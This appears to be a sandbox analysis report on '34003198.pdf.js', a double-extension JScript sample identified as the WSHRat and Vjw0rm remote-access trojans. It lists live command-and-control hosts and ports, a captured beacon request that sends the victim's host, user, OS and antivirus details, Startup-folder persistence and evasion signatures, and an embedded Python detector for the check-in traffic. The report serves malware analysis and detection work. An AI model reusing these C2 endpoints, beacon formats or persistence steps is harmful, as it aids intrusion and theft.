Windows Analysis Report
34003198.pdf.js

Overview

General Information

Sample name: 34003198.pdf.js
Analysis ID: 1428759
MD5: 6812d6fba47adabb337563ca20fa84f8
SHA1: 2ab5b312c71f2a60d53c16fad7690291ea6d5bb0
SHA256: 6ac96e55099f4737d755e8caa4a03a4ad47faec1e7d133c3eb67c9a7057cd574
Tags: jsVjw0rm

Detection

WSHRat, VjW0rm
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Detected WSHRat
Found malware configuration
JScript performs obfuscated calls to suspicious functions
Sigma detected: Drops script at startup location
Sigma detected: Register Wscript In Run Key
Sigma detected: VjW0rm
Snort IDS alert for network traffic
System process connects to network (likely due to code injection or exploit)
Yara detected VjW0rm
Yara detected WSHRAT
C2 URLs / IPs found in malware configuration
Creates autostart registry keys with suspicious names
Drops script or batch files to the startup folder
Potential malicious VBS/JS script found (suspicious encoded strings)
Queries sensitive service information (via WMI, Win32_LogicalDisk, often done to detect sandboxes)
Sigma detected: Script Initiated Connection to Non-Local Network
Sigma detected: Suspicious Parent Double Extension File Execution
Sigma detected: WScript or CScript Dropper
Sigma detected: WScript or CScript Dropper - File
Uses an obfuscated file name to hide its real file extension (double extension)
Uses known network protocols on non-standard ports
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Wscript called in batch mode (//B, suppresses script errors and dialogs)
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected TCP or UDP traffic on non-standard ports
Found WSH timer for Javascript or VBS script (likely evasive script)
Internet Provider seen in connection with other malware
JavaScript / VBScript file with very long strings (likely obfuscated code)
Sigma detected: Script Initiated Connection
Sigma detected: Startup Folder File Write
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores files to the Windows start menu directory

Classification

Name: Houdini, WSHRAT
Description: Houdini is a VBS-based RAT dating back to 2013. Back in the day it used to be wrapped in an .exe, but in 2018 it started being spamvertised or downloaded by other malware directly as .vbs. In 2019 WSHRAT appeared, a JavaScript-based version of Houdini, recoded by an author going by the name Kognito.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.houdini

Name: Vjw0rm
Description: VJW0rm (aka Vengeance Justice Worm) is a publicly available, modular JavaScript RAT. Vjw0rm was first released in November 2016 by its primary author, v_B01 (aka Sliemerez), within the prominent DevPoint Arabic-language malware development community. VJW0rm appears to be the JavaScript variant of a series of RATs with identical functionality released by the author throughout late 2016. Other variants include a Visual Basic Script (VBS) based worm titled vw0rm (Vengeance Worm), an AutoHotkey-based tool called vrw0rm (Vengeance Rise Worm), and a PowerShell-based variant called vdw0rm (Vengeance Depth Worm).
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.vjw0rm

AV Detection

Source: amsi64_2316.amsi.csv Malware Configuration Extractor: VjW0rm {"C2 url": "http://jemyy.theworkpc.com:5401/Vre"}
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows

Networking

Source: Traffic Snort IDS: 2828283 ETPRO TROJAN vjw0rm Checkin 192.168.2.4 -> 109.248.151.106:5401 (5 alerts, source ports 49730, 49732, 49741, 49745, 49748)
Source: Traffic Snort IDS: 2017516 ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 192.168.2.4 -> 94.156.71.108:1604 (38 alerts, source ports 49731, 49733, 49739-49740, 49742-49744, 49746-49747, 49749-49752, 49754-49778)
Source: C:\Windows\System32\wscript.exe Network Connect: 94.156.71.108 1604
Source: C:\Windows\System32\wscript.exe Network Connect: 109.248.151.106 5401
Source: Malware configuration extractor URLs: http://jemyy.theworkpc.com:5401/Vre
Source: unknown Network traffic detected: HTTP traffic to port 5401 from source ports 49730, 49732, 49741, 49745, 49748
Source: unknown Network traffic detected: HTTP traffic to port 1604 from source ports 49731, 49733, 49739-49740, 49742-49744, 49746-49747, 49749-49752, 49754-49778
Source: global traffic TCP traffic: 192.168.2.4:49730 -> 109.248.151.106:5401
Source: global traffic TCP traffic: 192.168.2.4:49731 -> 94.156.71.108:1604
Source: Joe Sandbox View ASN Name: TERASYST-ASBG
Source: Joe Sandbox View ASN Name: DATACLUBLV
Source: unknown TCP traffic detected without corresponding DNS query: 94.156.71.108
Source: unknown DNS traffic detected: queries for: jemyy.theworkpc.com
Source: unknown HTTP traffic detected:
POST /Vre HTTP/1.1
Accept: */*
User-Agent: JUNE_B81A4609\user-PC\user\Microsoft Windows 10 Pro\Windows Defender\\YES\FALSE\
Accept-Language: en-ch
UA-CPU: AMD64
Accept-Encoding: gzip, deflate
Host: jemyy.theworkpc.com:5401
Content-Length: 0
Connection: Keep-Alive
Cache-Control: no-cache
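The captured Vjw0rm check-in above is worth parsing mechanically: the whole host fingerprint travels in the User-Agent, separated by backslashes, and the request goes to a non-standard port with an empty body. The Python below is an added example, not part of the Joe Sandbox report and not code from either malware family. It parses the request, splits the User-Agent into fields (the field names are assumptions inferred from the captured value; the computer name, user name, OS caption and AV product are the recognisable ones, and the YES/NO and TRUE/FALSE alternatives beyond the YES and FALSE actually seen are assumed), and flags the two check-in shapes in this analysis: the Vjw0rm User-Agent pattern and a POST to /is-ready on the WSHRAT C2 at 94.156.71.108:1604. The WSHRAT request and the benign request are constructed for the example; only the /is-ready path and the endpoint come from the report.

```python
"""
Added example (not from the Joe Sandbox report): parse the Vjw0rm check-in
captured in the report and flag the two C2 check-in shapes it contains.
User-Agent field names are assumptions inferred from the captured value.
"""

# Captured in the report (sent to jemyy.theworkpc.com:5401). The extracted
# page ran the header lines together; they are restored here with CRLF.
VJW0RM_CHECKIN = (
    "POST /Vre HTTP/1.1\r\n"
    "Accept: */*\r\n"
    "User-Agent: JUNE_B81A4609\\user-PC\\user\\Microsoft Windows 10 Pro"
    "\\Windows Defender\\\\YES\\FALSE\\\r\n"
    "Accept-Language: en-ch\r\n"
    "UA-CPU: AMD64\r\n"
    "Accept-Encoding: gzip, deflate\r\n"
    "Host: jemyy.theworkpc.com:5401\r\n"
    "Content-Length: 0\r\n"
    "Connection: Keep-Alive\r\n"
    "Cache-Control: no-cache\r\n"
    "\r\n"
)

# Constructed (not captured): only the /is-ready path and the 94.156.71.108:1604
# endpoint come from the report; the User-Agent is a placeholder.
WSHRAT_CHECKIN = (
    "POST /is-ready HTTP/1.1\r\n"
    "User-Agent: placeholder\r\n"
    "Host: 94.156.71.108:1604\r\n"
    "Content-Length: 0\r\n"
    "\r\n"
)

# Constructed benign control.
BENIGN = (
    "GET /index.html HTTP/1.1\r\n"
    "User-Agent: Mozilla/5.0\r\n"
    "Host: www.example.com\r\n"
    "\r\n"
)

# Assumed field names, in the order they appear in the captured User-Agent.
# "id" looks like a hard-coded tag plus a serial; flag1/flag2 are unexplained.
VJW0RM_FIELDS = ("id", "computer", "user", "os", "av", "flag1", "flag2")


def parse_request(raw):
    """Minimal HTTP/1.x request parser: request line plus headers (lower-cased names)."""
    head, _, body = raw.partition("\r\n\r\n")
    request_line, *header_lines = head.split("\r\n")
    method, path, version = request_line.split(" ", 2)
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return {"method": method, "path": path, "version": version,
            "headers": headers, "body": body}


def parse_vjw0rm_ua(ua):
    """Split a Vjw0rm-style User-Agent into named fields, or return None.

    Shape seen in the report: seven backslash-separated values, one empty
    field where the double backslash sits, and a trailing backslash.
    """
    parts = ua.split("\\")
    if len(parts) != 9 or parts[5] != "" or parts[8] != "":
        return None
    values = parts[:5] + parts[6:8]
    # The report shows YES and FALSE; the alternatives are an assumption.
    if values[5] not in ("YES", "NO") or values[6] not in ("TRUE", "FALSE"):
        return None
    return dict(zip(VJW0RM_FIELDS, values))


def host_port(host):
    """Port from a Host header, defaulting to 80 for plain HTTP."""
    _, sep, port = host.rpartition(":")
    return int(port) if sep and port.isdigit() else 80


def classify(raw):
    """Return the path, destination port, parsed UA fields and a list of findings."""
    req = parse_request(raw)
    ua = req["headers"].get("user-agent", "")
    port = host_port(req["headers"].get("host", ""))
    fields = parse_vjw0rm_ua(ua)
    findings = []
    if req["method"] == "POST" and fields is not None:
        findings.append("vjw0rm-checkin")
    if req["method"] == "POST" and req["path"].lower() == "/is-ready":
        findings.append("wshrat-checkin")
    if port not in (80, 443):          # "known protocol on non-standard port"
        findings.append("http-on-nonstandard-port")
    return {"path": req["path"], "port": port, "fields": fields, "findings": findings}


if __name__ == "__main__":
    for label, raw in (("vjw0rm", VJW0RM_CHECKIN), ("wshrat", WSHRAT_CHECKIN), ("benign", BENIGN)):
        print(label, classify(raw))
```

The Vjw0rm check is deliberately keyed on the User-Agent shape rather than on the /Vre path or the hostname, because the path and C2 are per-build configuration (see the extracted config above) while the field layout is what the family shares; the WSHRAT check uses the /is-ready path, which is the only part of that family's request this report exposes.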
Source: wscript.exe, 00000002.00000003.1894927688.0000020BE1CC4000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000003.1894678392.0000020BE1CC2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000003.1895136067.0000020BE1CCA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000003.1894678392.0000020BE1D09000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000003.1895136067.0000020BE1D09000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.2075840679.00000221C10A2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.2074574369.00000221C107D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://94.156.71.108/
Source: wscript.exe, 00000006.00000003.2075840679.00000221C10A2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://94.156.71.108/&
Source: wscript.exe, 00000002.00000003.1894927688.0000020BE1CC4000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000003.1894678392.0000020BE1CC2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000003.1895136067.0000020BE1CCA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://94.156.71.108/3a
Source: wscript.exe, 00000006.00000003.2074574369.00000221C107D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://94.156.71.108/BootDeve
Source: wscript.exe, 00000006.00000003.2074574369.00000221C107D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://94.156.71.108/nPrevention_Q
Source: wscript.exe, 00000006.00000003.2074574369.00000221C107D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://94.156.71.108:1604/is-ready
Source: wscript.exe, 00000002.00000003.1894450811.0000020BE1EEA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000003.1895295189.0000020BE1FDC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://94.156.71.108:1604/is-ready.mui
Source: wscript.exe, 00000002.00000003.1895073011.0000020BE1D16000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000003.1894678392.0000020BE1D09000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://94.156.71.108:1604/is-ready;M
Source: wscript.exe, 00000006.00000003.2074574369.00000221C11C5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://94.156.71.108:1604/is-readyB
Source: wscript.exe, 00000006.00000003.2075840679.00000221C10A2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://94.156.71.108:1604/is-readyS
Source: wscript.exe, 00000006.00000003.2075840679.00000221C10A2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://94.156.71.108:1604/is-readyT
Source: wscript.exe, 00000006.00000003.2075840679.00000221C10A2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://94.156.71.108:1604/is-readyY
Source: wscript.exe, 00000002.00000003.1895073011.0000020BE1D16000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000003.1894678392.0000020BE1D09000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://94.156.71.108:1604/is-readybM
Source: wscript.exe, 00000002.00000003.1895073011.0000020BE1D16000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000003.1894678392.0000020BE1D09000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://94.156.71.108:1604/is-readykM
Source: wscript.exe, 00000002.00000003.1895073011.0000020BE1D16000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000003.1894678392.0000020BE1D09000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://94.156.71.108:1604/is-readymM
Source: wscript.exe, 00000006.00000003.2075840679.00000221C10A2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://94.156.71.108:1604/is-readyng
Source: wscript.exe, 00000002.00000003.1894678392.0000020BE1D20000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000003.1895231999.0000020BE1D22000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com

Key, Mouse, Clipboard, Microphone and Screen Capturing

Source: Yara match File source: amsi64_4108.amsi.csv, type: OTHER
Source: Yara match File source: amsi64_3168.amsi.csv, type: OTHER
Source: Yara match File source: amsi64_3052.amsi.csv, type: OTHER
Source: Yara match File source: amsi64_2108.amsi.csv, type: OTHER
Source: Yara match File source: dump.pcap, type: PCAP
Source: Yara match File source: 00000000.00000003.1717094086.00000204EDD11000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000003.2052217166.000001B0667E1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.1732635440.00000204E96D4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000003.1895477782.0000020BE1A81000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.2075840679.00000221C10A2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.1732046092.00000204E96D3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000003.2044832701.000001B066B5B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.1946740186.00000221C1074000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.1948124676.00000221C10C0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000003.1756338470.0000020BE1DFB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.1716943117.00000204EE000000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.1939972889.00000221C11A2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000003.1895073011.0000020BE1D16000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000003.1894450811.0000020BE1EEA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.1717820374.00000204ED0E4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.1733013257.00000204E96D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000003.1961308985.0000020BE1EEA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000003.1894678392.0000020BE1D09000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.1707066216.00000204EDF11000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.1734499646.00000204E96DB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000003.2051877056.000001B066C4A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.1939694643.00000221C0FD1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.2074574369.00000221C10A2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000003.2053586111.000001B065B93000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.1716028940.00000204EE000000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000003.2051515691.000001B066DEF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.1733327075.00000204E96DB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.1734834487.00000204E96DB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000003.2052217166.000001B066887000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000003.1894927688.0000020BE1D09000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.1707419041.00000204EDF11000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000003.1899732633.0000020BE1EEA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.1716743000.00000204EE31A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.1707269284.00000204EE0E2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: wscript.exe PID: 4108, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: wscript.exe PID: 3168, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: wscript.exe PID: 3052, type: MEMORYSTR

System Summary

barindex
Source: 34003198.pdf.js Initial sample: Suspicious string win32_ D2LUMZJF
Source: C:\Windows\System32\wscript.exe COM Object queried: ADODB.Stream HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{00000566-0000-0010-8000-00AA006D2EA4} Jump to behavior
Source: C:\Windows\System32\wscript.exe COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8} Jump to behavior
Source: C:\Windows\System32\wscript.exe COM Object queried: WBEM Locator HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24} Jump to behavior
Source: C:\Windows\System32\wscript.exe COM Object queried: Windows Management and Instrumentation HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{8BC3F05E-D86B-11D0-A075-00C04FB68820} Jump to behavior
Source: C:\Windows\System32\wscript.exe COM Object queried: Shell Automation Service HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{13709620-C279-11CE-A49E-444553540000} Jump to behavior
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\wscript.exe" //B "C:\Users\user\AppData\Roaming\bCdHGOcGLp.js"
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\wscript.exe" //B "C:\Users\user\AppData\Roaming\34003198.pdf.js"
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\wscript.exe" //B "C:\Users\user\AppData\Roaming\bCdHGOcGLp.js"
Source: unknown Process created: C:\Windows\System32\wscript.exe "C:\Windows\system32\wscript.exe" //B "C:\Users\user\AppData\Roaming\34003198.pdf.js"
Source: unknown Process created: C:\Windows\System32\wscript.exe "C:\Windows\system32\wscript.exe" //B "C:\Users\user\AppData\Roaming\34003198.pdf.js"
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\wscript.exe" //B "C:\Users\user\AppData\Roaming\bCdHGOcGLp.js"
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\wscript.exe" //B "C:\Users\user\AppData\Roaming\bCdHGOcGLp.js"
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\wscript.exe" //B "C:\Users\user\AppData\Roaming\34003198.pdf.js"
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\wscript.exe" //B "C:\Users\user\AppData\Roaming\bCdHGOcGLp.js" Jump to behavior
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\wscript.exe" //B "C:\Users\user\AppData\Roaming\34003198.pdf.js" Jump to behavior
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\wscript.exe" //B "C:\Users\user\AppData\Roaming\bCdHGOcGLp.js" Jump to behavior
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\wscript.exe" //B "C:\Users\user\AppData\Roaming\bCdHGOcGLp.js"
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\wscript.exe" //B "C:\Users\user\AppData\Roaming\bCdHGOcGLp.js" Jump to behavior
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\wscript.exe" //B "C:\Users\user\AppData\Roaming\34003198.pdf.js" Jump to behavior
Source: 34003198.pdf.js Initial sample: Strings found which are bigger than 50
Source: classification engine Classification label: mal100.troj.expl.evad.winJS@17/6@1/2
Source: C:\Windows\System32\wscript.exe File created: C:\Users\user\AppData\Roaming\bCdHGOcGLp.js Jump to behavior
Source: C:\Windows\System32\wscript.exe File read: C:\Users\user\Desktop\desktop.ini Jump to behavior
Source: C:\Windows\System32\wscript.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: unknown Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\34003198.pdf.js"
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\wscript.exe" //B "C:\Users\user\AppData\Roaming\bCdHGOcGLp.js"
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\wscript.exe" //B "C:\Users\user\AppData\Roaming\34003198.pdf.js"
Source: unknown Process created: C:\Windows\System32\wscript.exe "C:\Windows\system32\wscript.exe" //B "C:\Users\user\AppData\Roaming\34003198.pdf.js"
Source: unknown Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\34003198.pdf.js"
Source: unknown Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\bCdHGOcGLp.js"
Source: C:\Windows\System32\wscript.exe Section loaded: version.dll
Source: C:\Windows\System32\wscript.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wscript.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\wscript.exe Section loaded: sxs.dll
Source: C:\Windows\System32\wscript.exe Section loaded: jscript.dll
Source: C:\Windows\System32\wscript.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\wscript.exe Section loaded: amsi.dll
Source: C:\Windows\System32\wscript.exe Section loaded: userenv.dll
Source: C:\Windows\System32\wscript.exe Section loaded: profapi.dll
Source: C:\Windows\System32\wscript.exe Section loaded: wldp.dll
Source: C:\Windows\System32\wscript.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\wscript.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\wscript.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\wscript.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\wscript.exe Section loaded: msisip.dll
Source: C:\Windows\System32\wscript.exe Section loaded: wshext.dll
Source: C:\Windows\System32\wscript.exe Section loaded: scrobj.dll
Source: C:\Windows\System32\wscript.exe Section loaded: msxml3.dll
Source: C:\Windows\System32\wscript.exe Section loaded: msdart.dll
Source: C:\Windows\System32\wscript.exe Section loaded: mlang.dll
Source: C:\Windows\System32\wscript.exe Section loaded: mpr.dll
Source: C:\Windows\System32\wscript.exe Section loaded: scrrun.dll
Source: C:\Windows\System32\wscript.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\wscript.exe Section loaded: propsys.dll
Source: C:\Windows\System32\wscript.exe Section loaded: edputil.dll
Source: C:\Windows\System32\wscript.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\wscript.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\wscript.exe Section loaded: netutils.dll
Source: C:\Windows\System32\wscript.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\System32\wscript.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\wscript.exe Section loaded: wintypes.dll
Source: C:\Windows\System32\wscript.exe Section loaded: appresolver.dll
Source: C:\Windows\System32\wscript.exe Section loaded: bcp47langs.dll
Source: C:\Windows\System32\wscript.exe Section loaded: slc.dll
Source: C:\Windows\System32\wscript.exe Section loaded: sppc.dll
Source: C:\Windows\System32\wscript.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\wscript.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\wscript.exe Section loaded: ntmarta.dll
Source: C:\Windows\System32\wscript.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wscript.exe Section loaded: wininet.dll
Source: C:\Windows\System32\wscript.exe Section loaded: napinsp.dll
Source: C:\Windows\System32\wscript.exe Section loaded: pnrpnsp.dll
Source: C:\Windows\System32\wscript.exe Section loaded: wshbth.dll
Source: C:\Windows\System32\wscript.exe Section loaded: nlaapi.dll
Source: C:\Windows\System32\wscript.exe Section loaded: iphlpapi.dll
Source: C:\Windows\System32\wscript.exe Section loaded: mswsock.dll
Source: C:\Windows\System32\wscript.exe Section loaded: dnsapi.dll
Source: C:\Windows\System32\wscript.exe Section loaded: winrnr.dll
Source: C:\Windows\System32\wscript.exe Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\wscript.exe Section loaded: rasadhlp.dll
Source: C:\Windows\System32\wscript.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\wscript.exe Section loaded: winhttp.dll
Source: C:\Windows\System32\wscript.exe Section loaded: winnsi.dll
Source: C:\Windows\System32\wscript.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: scrobj.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: msxml3.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: msdart.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: mlang.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: scrrun.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: napinsp.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: pnrpnsp.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: wshbth.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: nlaapi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: winrnr.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: napinsp.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: pnrpnsp.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: wshbth.dll Jump to behavior
